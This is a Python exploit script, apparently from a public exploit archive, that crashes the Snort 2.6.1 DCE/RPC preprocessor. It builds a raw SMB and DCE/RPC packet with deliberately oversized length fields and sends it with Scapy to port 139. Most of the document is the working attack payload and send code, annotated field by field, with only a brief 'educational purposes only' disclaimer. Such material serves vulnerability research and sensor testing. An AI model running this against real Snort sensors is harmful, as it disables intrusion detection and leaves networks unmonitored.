
# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
# Published : 2007-02-23
# Author : Trirat Puttaraksa


#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
# 
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purposes only
#
# This exploit only crashes Snort 2.6.1 on Fedora Core 4. Code execution
# may be possible, but I have not had time to pursue it :(
# I will post the information about this vulnerability in my blog soon
#
# Note: this exploit uses Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so install Scapy before using it. The packet is
# sent as a raw, unsolicited TCP segment (no handshake), which is why any
# "fake" destination address visible to the sensor will do.
#
#######################################################

import sys
from scapy import *
from struct import pack
# Scapy verbosity; 0 silences the per-send chatter so the script is quiet.
# `conf` comes from the star import above (old single-module Scapy; current
# releases expose the same object via `scapy.all`).
conf.verb = 0

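# The crash packet: one TCP segment whose data is a NetBIOS session message
# carrying a chained SMB request (Tree Connect AndX -> NT Create AndX ->
# two Write AndX) with a DCE/RPC bind PDU inside each write. Several length
# fields below deliberately disagree with the bytes actually sent; those
# oversize values are presumably what drives the preprocessor's overflowing
# copy, so do not "correct" them. Field decoding in the comments was done by
# hand from the bytes -- confirm with a dissector if it matters.
#
# Python 2 str literals: each "\xNN" is one raw byte. The original posting
# lost the backslashes in transit ("x00x00..."), which left the script
# sending 1086 bytes of plain ASCII text instead of the 362-byte blob; the
# escapes are restored here.

# NetBIOS Session Service header: message type 0x00, flags 0x00, declared
# length 0x01a6 (422) although only 358 bytes follow.
payload = "\x00\x00\x01\xa6"

# SMB header (32 bytes): "\xffSMB" magic, command 0x75 (Tree Connect AndX).
payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
payload += "\x00\x08\x30\x00"

# Tree Connect AndX Request: chains to 0xa2 (NT Create AndX). Path is the
# UTF-16LE string "\\INS-KIRA\IPC$", service string "?????".
payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
payload += "\x3f\x3f\x3f\x3f\x3f\x00"

# NT Create AndX Request: chains to 0x2f (Write AndX); opens the UTF-16LE
# pipe name "\srvsvc".
payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
payload += "\x63\x00\x00\x00"

# Write AndX Request #1: chains to another Write AndX (0x2f). Its DataLength
# 0x0048 (72) matches the PDU that follows.
payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

# DCE/RPC bind PDU #1 (version 5.0, ptype 0x0b, first+last fragment) to the
# srvsvc interface: 72 bytes on the wire but frag_length 0x01ff (511).
payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"

# Write AndX Request #2: ends the AndX chain (0xff). This time the SMB write
# claims DataLength 0x01ff (511) while only 72 bytes of PDU follow.
payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += "\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee"

# DCE/RPC bind PDU #2: same bind, but with an honest frag_length 0x0048 (72).
payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"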

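# Exactly one positional argument: the destination IP to put in the forged
# packet. Nothing is ever received back (no handshake, fixed source port), so
# any address whose traffic the Snort sensor sees will do.
if len(sys.argv) != 2:
    # Usage errors go to stderr so they are not mistaken for program output;
    # print() form also parses under Python 3 even though the script is Py2.
    sys.stderr.write("Usage snort_dos_dcerpc.py <fake destination ip>\n")
    sys.exit(1)

target = sys.argv[1]

# One unsolicited TCP segment, PSH/ACK set, from port 1025 to the NetBIOS
# session port 139, carrying the whole SMB/DCE-RPC blob as segment data.
# Scapy's send() emits a raw IP packet, which typically requires root
# (CAP_NET_RAW on Linux). Only run this against a sensor you are
# authorised to test.
p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)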
